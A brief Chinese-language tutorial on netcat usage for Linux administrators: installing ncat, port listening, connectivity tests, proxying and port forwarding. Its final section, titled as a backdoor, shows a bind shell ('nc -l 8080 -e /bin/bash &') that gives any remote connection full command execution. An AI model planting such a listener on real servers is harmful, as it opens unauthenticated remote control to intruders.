Linux 下NC比较实用的用法示例

## 软件安装
yum install nmap-ncat -y

## 端口占用模拟(一般用来临时测试端口连通性)
nc -l 8080 --listen --keep-open --verbose --nodns

## 测试端口连通性(必须加-v)
nc -v 10.186.63.79 22

## 作为代理(将10.186.63.79的5799端口映射到本机80端口)
## 一般用于只有一台服务器可外网访问时,将其他服务器映射到该可外网访问的服务器端口
nc --sh-exec "nc 10.186.63.79 5799" -l 80 --keep-open &

## 作为端口转发,使用方式和作为代理类似,只是转发指定的是本机的端口
## 将本机1004作为80端口的转发端口(实际80端口又是上面10.186.63.79服务器5799的代理端口)
nc --sh-exec "nc 127.0.0.1 80" -l 1004 --keep-open &

## 作为后门使用
# 1. 在需要设置后门的服务器配置一个端口并执行/bin/bash,挂到后台运行
nc -l 8080 -e /bin/bash &

# 2. 远程通过ncat访问这个端口后可以执行所有管理命令
nc 10.186.61.162 8080